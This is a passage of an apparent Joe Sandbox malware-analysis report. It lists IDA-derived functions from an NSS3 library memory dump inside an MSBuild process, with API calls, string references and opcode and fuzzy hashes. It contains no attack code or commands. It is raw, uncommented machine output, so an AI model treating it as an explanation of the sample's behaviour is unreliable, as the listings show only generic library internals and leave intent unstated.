PORT_Alloc_Util.NSS3(?), ref: 6CBBA4EC

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6CBBA527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6CBBA56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6CBBA583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6CBBA596
free.MOZGLUE(?), ref: 6CBBA5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBBA5B6

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID:
API String ID: 3906949479-0
Opcode ID: 6d37c9e123051e2859dbe12c5b0e2e67c4ddec040ad771de57eed9c89f4db491
Instruction ID: 7040354fd567247c58279f708233ea0582ea432652bd9ed3965e84ef6f436f27
Opcode Fuzzy Hash: 6d37c9e123051e2859dbe12c5b0e2e67c4ddec040ad771de57eed9c89f4db491
Instruction Fuzzy Hash: CC41F871E002819FDB10CF59CD40BAABB71EF40308F15C459D8596BB41EB31EA19CBA2

Function 6CB84E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CB84E90
EnterCriticalSection.KERNEL32 ref: 6CB84EA9
TlsGetValue.KERNEL32 ref: 6CB84EC6
EnterCriticalSection.KERNEL32 ref: 6CB84EDF
PL_HashTableLookup.NSS3 ref: 6CB84EF8
PR_Unlock.NSS3 ref: 6CB84F05
PR_Now.NSS3 ref: 6CB84F13
PR_Unlock.NSS3 ref: 6CB84F3A

Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 9b8d0c1163d5908ddc73b1ec99c866466cdbab44b77e4dce557bb6fdb0f22d8d
Instruction ID: 71271179409dbfa10e07a8a89d69ee04ce7b0de43b73fbc12f969a6add18d084
Opcode Fuzzy Hash: 9b8d0c1163d5908ddc73b1ec99c866466cdbab44b77e4dce557bb6fdb0f22d8d
Instruction Fuzzy Hash: BA4139B4A006459FCB00EF78C0948AABBF4FF49314F118569EC999B711EB30E895CFA1

Function 6CB565D0 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 261COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CB5670B
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6CB52B2C), ref: 6CB5675E
EnterCriticalSection.KERNEL32(?), ref: 6CB5678E
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6CB52B2C), ref: 6CB567E1

Strings

winUnmapfile1, xrefs: 6CB56964
winClose, xrefs: 6CB568C5
winUnmapfile2, xrefs: 6CB5698B

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: winClose$winUnmapfile1$winUnmapfile2
API String ID: 3168844106-373099266
Opcode ID: c57272b23677b66143dfe8e3c7d4e6b1f8d19df07cb846272eb03678c5143cbe
Instruction ID: 22e804d07abddee281b8d60840aaaf1092995b96f566299fe0713d1a34f3c786
Opcode Fuzzy Hash: c57272b23677b66143dfe8e3c7d4e6b1f8d19df07cb846272eb03678c5143cbe
Instruction Fuzzy Hash: 07A1AE75B41250CFDF08DFA5E898A693770FF0A716B44406CE906CBB80DB34AD52CB96

Function 6CB52D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CB52D69

Strings

winUnmapfile1, xrefs: 6CB52F55
winTruncate2, xrefs: 6CB52EF8
winSeekFile, xrefs: 6CB52E9C
winTruncate1, xrefs: 6CB52EBE
winUnmapfile2, xrefs: 6CB52F7F

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 9420797a11dcf24de56e1a0d70cab6a66b9bea427971d649d5a0a49be0f673f6
Instruction ID: 4b41abd894560b0aed5266c6036a198b16e6c803d095d8759f6dc6cf83458458
Opcode Fuzzy Hash: 9420797a11dcf24de56e1a0d70cab6a66b9bea427971d649d5a0a49be0f673f6
Instruction Fuzzy Hash: A1618071B012059FDB04CFA8DC98A6A77B1FF49314F50812CE91A9B7D0EB35AD16CB92

Function 6CBAAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CBAAB3E,?,?,?), ref: 6CBAAC35

Part of subcall function 6CB8CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CB8CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CBAAB3E,?,?,?), ref: 6CBAAC55

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CBAAB3E,?,?), ref: 6CBAAC70

Part of subcall function 6CB8E300: TlsGetValue.KERNEL32 ref: 6CB8E33C
Part of subcall function 6CB8E300: EnterCriticalSection.KERNEL32(?), ref: 6CB8E350
Part of subcall function 6CB8E300: PR_Unlock.NSS3(?), ref: 6CB8E5BC
Part of subcall function 6CB8E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CB8E5CA
Part of subcall function 6CB8E300: TlsGetValue.KERNEL32 ref: 6CB8E5F2
Part of subcall function 6CB8E300: EnterCriticalSection.KERNEL32(?), ref: 6CB8E606
Part of subcall function 6CB8E300: PORT_Alloc_Util.NSS3(?), ref: 6CB8E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CBAAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBAAB3E), ref: 6CBAACD7
PORT_Alloc_Util.NSS3(?), ref: 6CBAAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CBAAD2B

Part of subcall function 6CB8F360: TlsGetValue.KERNEL32(00000000,?,6CBAA904,?), ref: 6CB8F38B
Part of subcall function 6CB8F360: EnterCriticalSection.KERNEL32(?,?,?,6CBAA904,?), ref: 6CB8F3A0
Part of subcall function 6CB8F360: PR_Unlock.NSS3(?,?,?,?,6CBAA904,?), ref: 6CB8F3D3

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: a38b3e7d4e1334110d46b4f5e9fe00f7be0d49e992c640a73f85b56419d14b7f
Instruction ID: e9ad1124726a4a8894e53eb07503ca0b9f27e19e3ebdb4e05e5a1a6ac27c5960
Opcode Fuzzy Hash: a38b3e7d4e1334110d46b4f5e9fe00f7be0d49e992c640a73f85b56419d14b7f
Instruction Fuzzy Hash: 7C3127B1E046556FEB008FA9DC409AF7776EF84728B188128E8559B740FB31DC068FB2

Function 6CB88C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CB88C7C

Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB88CB0
TlsGetValue.KERNEL32 ref: 6CB88CD1
EnterCriticalSection.KERNEL32(?), ref: 6CB88CE5
PR_Unlock.NSS3(?), ref: 6CB88D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CB88D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB88D93

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 9dcd46033fd6dbdec143f8567e8c530ea1ac830b6051ef2a10eee457e4199eb8
Instruction ID: 0c66355ba32d26d3519cf33d1ba9033f2d9b49637bfce6e1aaecabeb2b2304d7
Opcode Fuzzy Hash: 9dcd46033fd6dbdec143f8567e8c530ea1ac830b6051ef2a10eee457e4199eb8
Instruction Fuzzy Hash: E3314A71E02255AFD7009F68DC447EA77B4FF15318F14013AEA1567B50E772A924CBD2

Function 6CBA8500 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CBA95DC,00000000,00000000,00000000,?,6CBA95DC,00000000,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA8517

Part of subcall function 6CBBBE30: SECOID_FindOID_Util.NSS3(6CB7311B,00000000,?,6CB7311B,?), ref: 6CBBBE44

PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA8585
PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA859A
SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6CC8D8C4,6CBA95D0,?,?,?,00000000,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA85CC
SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA85E1
PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB87F4A,00000000,?), ref: 6CBA85F4

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
String ID:
API String ID: 738345241-0
Opcode ID: c6b3a96d85a7e394be5a32309e430ebd5787d15b3882fc699a5e32b70a21fd7c
Instruction ID: 10ebacdc77b87a98adeb400319d0a411f604daa052fe918a550c87e9388928ff
Opcode Fuzzy Hash: c6b3a96d85a7e394be5a32309e430ebd5787d15b3882fc699a5e32b70a21fd7c
Instruction Fuzzy Hash: EF3138A2D091C057F710599C9C90B6A3218EB1139CF550673F885D7EF2EB22D986C2A3

Function 6CB74590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CB745B5

Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B

PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CB745C9

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CB745E6
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB745F8

Part of subcall function 6CBBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBB8D2D,?,00000000,?), ref: 6CBBFB85
Part of subcall function 6CBBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBBFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB74647
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CC8A0F4,?), ref: 6CB7468C
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB746A1

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
String ID:
API String ID: 1594507116-0
Opcode ID: 1722b7a237ca175d11cab726a0f51137cc2d3b6826616a2889f962b8250d3090
Instruction ID: 043af5cd48a7116177921b7908f1efee13f02774a1024fdb70f8f40d75c0e393
Opcode Fuzzy Hash: 1722b7a237ca175d11cab726a0f51137cc2d3b6826616a2889f962b8250d3090
Instruction Fuzzy Hash: 7031C2B1B002549BEF205E58DC51BAB36A8EB46349F040078ED15EF781EB75C8088FB7

Function 6CB82E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CB7E728,?,00000038,?,?,00000000), ref: 6CB82E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB82E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB82E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6CB82E8F
PL_HashTableLookup.NSS3(?,?), ref: 6CB82E9E
PR_Unlock.NSS3(?), ref: 6CB82EAB
PR_Unlock.NSS3(?), ref: 6CB82F0D

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 98fcf389b6faed3f4ebeab8dc7455aedb70d0c90cb8b74622d3c8d1c892695a7
Instruction ID: 58d0a708de5873d6f01e0ac2e8a81b49786b5911f629eb509eb30726395cd881
Opcode Fuzzy Hash: 98fcf389b6faed3f4ebeab8dc7455aedb70d0c90cb8b74622d3c8d1c892695a7
Instruction Fuzzy Hash: 0131E2B5A01185AFEB019F68D8848AABB79EF15259B048164EC1887A11FB31ED64C7F2

Function 6CBB4470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6CB77296,00000000), ref: 6CBB4487
EnterCriticalSection.KERNEL32(?,?,?,6CB77296,00000000), ref: 6CBB44A0
PR_Unlock.NSS3(?,?,?,?,6CB77296,00000000), ref: 6CBB44BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6CB77296,00000000), ref: 6CBB44DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6CB77296,00000000), ref: 6CBB4530
free.MOZGLUE(?,?,?,?,?,6CB77296,00000000), ref: 6CBB453C
PORT_FreeArena_Util.NSS3 ref: 6CBB454F

Part of subcall function 6CB9CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6CB7B1EE,D958E836,?,6CBB51C5), ref: 6CB9CAFA
Part of subcall function 6CB9CAA0: PR_UnloadLibrary.NSS3(?,6CBB51C5), ref: 6CB9CB09

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: b168371235acaa824fda78bffd5d15abef2dc94e39699ba9265f7de9dca99df9
Instruction ID: d0b2708789b75b254c4f61abe7a6e3bfe21847f7f4f4ccbf69c12f9cc8b04119
Opcode Fuzzy Hash: b168371235acaa824fda78bffd5d15abef2dc94e39699ba9265f7de9dca99df9
Instruction Fuzzy Hash: CF312F74A04A959FDB00AF79C184669B7F4FF05319F014669D899A7B00EB30E894CFD2

Function 6CBCCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CBCCD93,?), ref: 6CBCCEEE

Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBCCD93,?), ref: 6CBCCEFC

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBCCD93,?), ref: 6CBCCF0B

Part of subcall function 6CBC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBCCD93,?), ref: 6CBCCF1D

Part of subcall function 6CBBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBB8D2D,?,00000000,?), ref: 6CBBFB85
Part of subcall function 6CBBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBBFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CBCCD93,?,?,?,?,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF78

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
